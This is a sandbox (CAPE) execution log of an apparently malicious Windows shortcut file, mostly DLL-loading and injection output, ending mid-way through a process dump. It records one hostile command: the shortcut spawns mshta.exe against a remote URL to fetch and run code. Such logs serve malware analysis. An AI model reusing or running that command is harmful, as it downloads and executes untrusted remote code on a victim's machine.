Analysis

Category Package Started Completed Duration Log
FILE lnk 2020-05-23 00:22:31 2020-05-23 00:26:43 252 seconds Show Log
2020-05-13 09:13:31,032 [root] INFO: Date set to: 20200523T00:10:57, timeout set to: 200
2020-05-23 00:10:57,046 [root] DEBUG: Starting analyzer from: C:\tmpq_mrpfl7
2020-05-23 00:10:57,046 [root] DEBUG: Storing results at: C:\NduTvp
2020-05-23 00:10:57,046 [root] DEBUG: Pipe server name: \\.\PIPE\rdToedB
2020-05-23 00:10:57,046 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-05-23 00:10:57,046 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-05-23 00:10:57,046 [root] INFO: Automatically selected analysis package "lnk"
2020-05-23 00:10:57,046 [root] DEBUG: Trying to import analysis package "lnk"...
2020-05-23 00:10:57,062 [root] DEBUG: Imported analysis package "lnk".
2020-05-23 00:10:57,062 [root] DEBUG: Trying to initialize analysis package "lnk"...
2020-05-23 00:10:57,062 [root] DEBUG: Initialized analysis package "lnk".
2020-05-23 00:10:57,093 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-05-23 00:10:57,093 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-05-23 00:10:57,093 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-05-23 00:10:57,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-05-23 00:10:57,109 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-05-23 00:10:57,125 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-05-23 00:10:57,125 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-05-23 00:10:57,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-05-23 00:10:57,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-05-23 00:10:57,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-05-23 00:10:57,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-05-23 00:10:57,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-05-23 00:10:57,156 [lib.api.screenshot] DEBUG: Importing 'math'
2020-05-23 00:10:57,156 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-05-23 00:10:57,281 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-05-23 00:10:57,281 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-05-23 00:10:57,281 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-05-23 00:10:57,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-05-23 00:10:57,281 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-05-23 00:10:57,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-05-23 00:10:57,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-05-23 00:10:57,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-05-23 00:10:57,296 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-05-23 00:10:57,296 [root] DEBUG: Initialized auxiliary module "Browser".
2020-05-23 00:10:57,296 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-05-23 00:10:57,296 [root] DEBUG: Started auxiliary module Browser
2020-05-23 00:10:57,296 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-05-23 00:10:57,312 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-05-23 00:10:57,312 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-05-23 00:10:57,312 [root] DEBUG: Started auxiliary module Curtain
2020-05-23 00:10:57,312 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-05-23 00:10:57,312 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-05-23 00:10:57,312 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-05-23 00:10:57,312 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-05-23 00:10:57,656 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2020-05-23 00:10:57,656 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-05-23 00:10:57,671 [root] DEBUG: Started auxiliary module DigiSig
2020-05-23 00:10:57,671 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-05-23 00:10:57,671 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-05-23 00:10:57,671 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-05-23 00:10:57,703 [root] DEBUG: Started auxiliary module Disguise
2020-05-23 00:10:57,703 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-05-23 00:10:57,703 [root] DEBUG: Initialized auxiliary module "Human".
2020-05-23 00:10:57,703 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-05-23 00:10:57,703 [root] DEBUG: Started auxiliary module Human
2020-05-23 00:10:57,703 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-05-23 00:10:57,718 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-05-23 00:10:57,718 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-05-23 00:10:57,718 [root] DEBUG: Started auxiliary module Procmon
2020-05-23 00:10:57,718 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-05-23 00:10:57,718 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-05-23 00:10:57,718 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-05-23 00:10:57,718 [root] DEBUG: Started auxiliary module Screenshots
2020-05-23 00:10:57,718 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-05-23 00:10:57,718 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-05-23 00:10:57,718 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-05-23 00:10:57,734 [root] DEBUG: Started auxiliary module Sysmon
2020-05-23 00:10:57,734 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-05-23 00:10:57,734 [root] DEBUG: Initialized auxiliary module "Usage".
2020-05-23 00:10:57,734 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-05-23 00:10:57,734 [root] DEBUG: Started auxiliary module Usage
2020-05-23 00:10:57,734 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL option
2020-05-23 00:10:57,734 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL_64 option
2020-05-23 00:10:57,734 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader option
2020-05-23 00:10:57,734 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader_64 option
2020-05-23 00:10:57,765 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\system32\cmd.exe" with arguments "/c start /wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk"" with pid 5152
2020-05-23 00:10:57,765 [lib.api.process] INFO: Monitor config for process 5152: C:\tmpq_mrpfl7\dll\5152.ini
2020-05-23 00:10:57,765 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpq_mrpfl7\dll\klphlro.dll, loader C:\tmpq_mrpfl7\bin\CMEGukf.exe
2020-05-23 00:10:57,812 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rdToedB.
2020-05-23 00:10:57,812 [root] DEBUG: Loader: Injecting process 5152 (thread 5092) with C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:10:57,812 [root] DEBUG: Process image base: 0x49FB0000
2020-05-23 00:10:57,812 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:10:57,812 [root] DEBUG: InjectDllViaIAT: Failed to allocate region in target process for new import table.
2020-05-23 00:10:57,828 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-05-23 00:10:57,906 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:10:57,921 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:10:57,937 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5152 at 0x6a450000, image base 0x49fb0000, stack from 0xa3000-0x1a0000
2020-05-23 00:10:57,937 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Windows\system32\cmd.exe" \c start \wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk".
2020-05-23 00:10:58,015 [root] INFO: loaded: b'5152'
2020-05-23 00:10:58,015 [root] INFO: Loaded monitor into process with pid 5152
2020-05-23 00:10:58,031 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-05-23 00:10:58,046 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-05-23 00:10:58,046 [root] DEBUG: Successfully injected DLL C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:00,062 [lib.api.process] INFO: Successfully resumed process with pid 5152
2020-05-23 00:11:00,109 [root] DEBUG: DLL loaded at 0x76AE0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2020-05-23 00:11:00,109 [root] DEBUG: DLL loaded at 0x74AC0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:11:00,125 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:11:00,125 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-05-23 00:11:00,125 [root] DEBUG: DLL loaded at 0x76500000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-05-23 00:11:00,218 [root] DEBUG: DLL loaded at 0x76010000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:11:00,249 [root] DEBUG: DLL loaded at 0x74900000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-05-23 00:11:00,265 [root] DEBUG: DLL loaded at 0x761A0000: C:\Windows\system32\WLDAP32 (0x45000 bytes).
2020-05-23 00:11:00,281 [root] DEBUG: DLL loaded at 0x75BE0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-05-23 00:11:00,406 [root] DEBUG: DLL loaded at 0x75AE0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-05-23 00:11:00,421 [root] DEBUG: DLL loaded at 0x6ED80000: C:\Windows\System32\shdocvw (0x2f000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\SETUPAPI (0x19d000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:00,453 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:00,468 [root] DEBUG: DLL unloaded from 0x76AE0000.
2020-05-23 00:11:00,875 [root] DEBUG: DLL loaded at 0x70B40000: C:\PROGRA~1\MICROS~3\Office14\GROOVEEX (0x406000 bytes).
2020-05-23 00:11:00,875 [root] DEBUG: DLL loaded at 0x71260000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCR90 (0xa3000 bytes).
2020-05-23 00:11:00,890 [root] DEBUG: DLL loaded at 0x711A0000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCP90 (0x8e000 bytes).
2020-05-23 00:11:00,890 [root] DEBUG: DLL loaded at 0x72410000: C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\ATL90 (0x2b000 bytes).
2020-05-23 00:11:00,890 [root] DEBUG: DLL loaded at 0x74790000: C:\Windows\system32\UxTheme (0x40000 bytes).
2020-05-23 00:11:00,906 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:00,921 [root] DEBUG: DLL loaded at 0x75390000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:00,937 [root] DEBUG: DLL loaded at 0x704D0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,937 [root] DEBUG: DLL unloaded from 0x704D0000.
2020-05-23 00:11:00,937 [root] DEBUG: DLL loaded at 0x704D0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,968 [root] DEBUG: DLL loaded at 0x6EBE0000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2020-05-23 00:11:00,984 [root] DEBUG: DLL loaded at 0x704D0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,984 [root] DEBUG: DLL loaded at 0x704D0000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x761F0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75C70000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75CD0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75CE0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75C80000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x75CC0000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,031 [root] DEBUG: DLL loaded at 0x750B0000: C:\Windows\system32\version (0x9000 bytes).
2020-05-23 00:11:01,046 [root] DEBUG: DLL loaded at 0x75C60000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-05-23 00:11:01,046 [root] DEBUG: DLL loaded at 0x75F50000: C:\Windows\system32\normaliz (0x3000 bytes).
2020-05-23 00:11:01,046 [root] DEBUG: DLL loaded at 0x779D0000: C:\Windows\system32\iertutil (0x215000 bytes).
2020-05-23 00:11:01,046 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:01,062 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-05-23 00:11:01,078 [root] DEBUG: DLL loaded at 0x71990000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:01,093 [root] INFO: Announced 32-bit process name: mshta.exe pid: 5120
2020-05-23 00:11:01,109 [lib.api.process] INFO: Monitor config for process 5120: C:\tmpq_mrpfl7\dll\5120.ini
2020-05-23 00:11:01,109 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpq_mrpfl7\dll\klphlro.dll, loader C:\tmpq_mrpfl7\bin\CMEGukf.exe
2020-05-23 00:11:01,125 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rdToedB.
2020-05-23 00:11:01,125 [root] DEBUG: Loader: Injecting process 5120 (thread 4020) with C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,125 [root] DEBUG: Process image base: 0x00CD0000
2020-05-23 00:11:01,125 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,125 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-05-23 00:11:01,125 [root] DEBUG: Successfully injected DLL C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,140 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5120
2020-05-23 00:11:01,171 [root] INFO: Announced 32-bit process name: mshta.exe pid: 5120
2020-05-23 00:11:01,171 [lib.api.process] INFO: Monitor config for process 5120: C:\tmpq_mrpfl7\dll\5120.ini
2020-05-23 00:11:01,187 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpq_mrpfl7\dll\klphlro.dll, loader C:\tmpq_mrpfl7\bin\CMEGukf.exe
2020-05-23 00:11:01,187 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rdToedB.
2020-05-23 00:11:01,187 [root] DEBUG: Loader: Injecting process 5120 (thread 4020) with C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,203 [root] DEBUG: Process image base: 0x00CD0000
2020-05-23 00:11:01,203 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,203 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-05-23 00:11:01,203 [root] DEBUG: Successfully injected DLL C:\tmpq_mrpfl7\dll\klphlro.dll.
2020-05-23 00:11:01,203 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5120
2020-05-23 00:11:01,203 [root] DEBUG: DLL loaded at 0x6BBE0000: C:\Windows\system32\sfc (0x3000 bytes).
2020-05-23 00:11:01,203 [root] DEBUG: DLL loaded at 0x6B880000: C:\Windows\system32\sfc_os (0xd000 bytes).
2020-05-23 00:11:01,218 [root] DEBUG: DLL unloaded from 0x6BBE0000.
2020-05-23 00:11:01,234 [root] DEBUG: DLL unloaded from 0x70B40000.
2020-05-23 00:11:01,249 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:11:01,249 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:11:01,249 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:01,249 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-05-23 00:11:01,249 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5120 at 0x6a450000, image base 0xcd0000, stack from 0x2d6000-0x2e0000
2020-05-23 00:11:01,249 [root] DEBUG: Commandline: C:\Windows\"C:\Windows\System32\msHta.Exe" http:\www.d01fa.net\images\D817583E\16364\11542\9f9d51bf\b0bdc66.
2020-05-23 00:11:01,265 [root] DEBUG: DLL unloaded from 0x761F0000.
2020-05-23 00:11:01,265 [root] INFO: loaded: b'5120'
2020-05-23 00:11:01,265 [root] INFO: Loaded monitor into process with pid 5120
2020-05-23 00:11:01,265 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\System32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:11:01,343 [root] DEBUG: DLL unloaded from 0x76AE0000.
2020-05-23 00:11:01,343 [root] DEBUG: DLL unloaded from 0x6ED80000.
2020-05-23 00:11:01,359 [root] DEBUG: DLL unloaded from 0x747E0000.
2020-05-23 00:11:01,375 [root] DEBUG: DLL unloaded from 0x76AE0000.
2020-05-23 00:11:01,500 [root] DEBUG: DLL loaded at 0x666B0000: C:\Windows\System32\mshtml (0x1062000 bytes).
2020-05-23 00:11:01,515 [root] DEBUG: DLL loaded at 0x75CD0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,515 [root] DEBUG: DLL loaded at 0x75C70000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,515 [root] DEBUG: DLL loaded at 0x761F0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:01,515 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:01,531 [root] DEBUG: DLL loaded at 0x76010000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:11:01,531 [root] DEBUG: DLL loaded at 0x76500000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-05-23 00:11:01,546 [root] DEBUG: DLL loaded at 0x74790000: C:\Windows\System32\UxTheme (0x40000 bytes).
2020-05-23 00:11:01,546 [root] DEBUG: DLL loaded at 0x74AC0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:11:01,546 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\System32\Secur32 (0x8000 bytes).
2020-05-23 00:11:01,562 [root] DEBUG: DLL loaded at 0x6C0A0000: C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:01,593 [root] DEBUG: DLL loaded at 0x76AE0000: C:\Windows\system32\shell32 (0xc4c000 bytes).
2020-05-23 00:11:01,593 [root] DEBUG: DLL loaded at 0x75BE0000: C:\Windows\System32\profapi (0xb000 bytes).
2020-05-23 00:11:01,609 [root] DEBUG: DLL loaded at 0x71990000: C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL loaded at 0x76750000: C:\Windows\system32\WS2_32 (0x35000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL loaded at 0x77D80000: C:\Windows\system32\NSI (0x6000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL loaded at 0x6F7C0000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL loaded at 0x6F770000: C:\Windows\system32\webio (0x50000 bytes).
2020-05-23 00:11:01,625 [root] DEBUG: DLL unloaded from 0x6F7C0000.
2020-05-23 00:11:01,640 [root] DEBUG: DLL loaded at 0x755C0000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-05-23 00:11:01,656 [root] DEBUG: DLL loaded at 0x740A0000: C:\Windows\System32\IPHLPAPI (0x1c000 bytes).
2020-05-23 00:11:01,656 [root] DEBUG: DLL loaded at 0x74060000: C:\Windows\System32\WINNSI (0x7000 bytes).
2020-05-23 00:11:01,656 [root] DEBUG: DLL loaded at 0x755B0000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-05-23 00:11:01,671 [root] DEBUG: DLL loaded at 0x75480000: C:\Windows\System32\DNSAPI (0x44000 bytes).
2020-05-23 00:11:01,687 [root] DEBUG: DLL loaded at 0x71060000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-05-23 00:11:01,687 [root] DEBUG: DLL loaded at 0x74720000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-05-23 00:11:01,703 [root] DEBUG: DLL loaded at 0x73F70000: C:\Windows\System32\dhcpcsvc6 (0xd000 bytes).
2020-05-23 00:11:01,703 [root] DEBUG: DLL loaded at 0x75140000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-05-23 00:11:01,703 [root] DEBUG: DLL loaded at 0x6C300000: C:\Windows\System32\ieframe (0xaba000 bytes).
2020-05-23 00:11:01,703 [root] DEBUG: DLL loaded at 0x6C2F0000: C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:01,718 [root] DEBUG: DLL loaded at 0x73F50000: C:\Windows\System32\dhcpcsvc (0x12000 bytes).
2020-05-23 00:11:01,718 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\System32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:01,718 [root] DEBUG: DLL loaded at 0x72290000: C:\Windows\System32\rasadhlp (0x6000 bytes).
2020-05-23 00:11:01,734 [root] DEBUG: DLL loaded at 0x6B4F0000: C:\Windows\system32\msimtf (0xb000 bytes).
2020-05-23 00:11:01,734 [root] DEBUG: DLL loaded at 0x75390000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:01,734 [root] DEBUG: DLL loaded at 0x75BD0000: C:\Windows\System32\RpcRtRemote (0xe000 bytes).
2020-05-23 00:11:01,750 [root] DEBUG: DLL loaded at 0x735F0000: C:\Windows\System32\OLEACC (0x3c000 bytes).
2020-05-23 00:11:01,750 [root] DEBUG: DLL loaded at 0x6E540000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-05-23 00:11:01,765 [root] DEBUG: DLL loaded at 0x75B40000: C:\Windows\System32\SXS (0x5f000 bytes).
2020-05-23 00:11:16,000 [root] DEBUG: DLL loaded at 0x6E2C0000: C:\Windows\System32\msls31 (0x31000 bytes).
2020-05-23 00:11:16,015 [root] DEBUG: DLL loaded at 0x684A0000: C:\Windows\System32\d2d1 (0x347000 bytes).
2020-05-23 00:11:16,031 [root] DEBUG: DLL loaded at 0x6B5F0000: C:\Windows\System32\DWrite (0x136000 bytes).
2020-05-23 00:11:16,031 [root] DEBUG: DLL loaded at 0x71B90000: C:\Windows\System32\dxgi (0x4c000 bytes).
2020-05-23 00:11:16,046 [root] DEBUG: DLL loaded at 0x74140000: C:\Windows\System32\dwmapi (0x13000 bytes).
2020-05-23 00:11:16,046 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:16,062 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:16,062 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:16,062 [root] DEBUG: DLL loaded at 0x75E90000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2020-05-23 00:11:16,062 [root] DEBUG: DLL loaded at 0x75D60000: C:\Windows\system32\CRYPT32 (0x122000 bytes).
2020-05-23 00:11:16,078 [root] DEBUG: DLL loaded at 0x75C50000: C:\Windows\system32\MSASN1 (0xc000 bytes).
2020-05-23 00:11:16,078 [root] DEBUG: DLL unloaded from 0x77830000.
2020-05-23 00:11:16,093 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:16,093 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:16,093 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:16,125 [root] DEBUG: DLL unloaded from 0x76600000.
2020-05-23 00:11:16,125 [root] DEBUG: DLL loaded at 0x719E0000: C:\Windows\System32\d3d11 (0x175000 bytes).
2020-05-23 00:11:16,125 [root] DEBUG: DLL loaded at 0x6B200000: C:\Windows\System32\D3D10Warp (0x1ea000 bytes).
2020-05-23 00:11:16,140 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:16,140 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:16,140 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:16,140 [root] DEBUG: DLL unloaded from 0x77830000.
2020-05-23 00:11:16,171 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:16,171 [root] DEBUG: DLL loaded at 0x75C90000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:16,171 [root] DEBUG: DLL loaded at 0x75CF0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:16,203 [root] DEBUG: DLL unloaded from 0x76600000.
2020-05-23 00:11:16,203 [root] DEBUG: DLL unloaded from 0x6B200000.
2020-05-23 00:11:51,750 [root] DEBUG: DLL unloaded from 0x763A0000.
2020-05-23 00:14:20,062 [root] INFO: Analysis timeout hit, terminating analysis.
2020-05-23 00:14:20,062 [lib.api.process] INFO: Terminate event set for process 5152
2020-05-23 00:14:20,062 [root] DEBUG: Terminate Event: Attempting to dump process 5152
2020-05-23 00:14:20,062 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x49FB0000.
2020-05-23 00:14:20,078 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-05-23 00:14:20,078 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x49FB0000.
2020-05-23 00:14:20,078 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000829A.
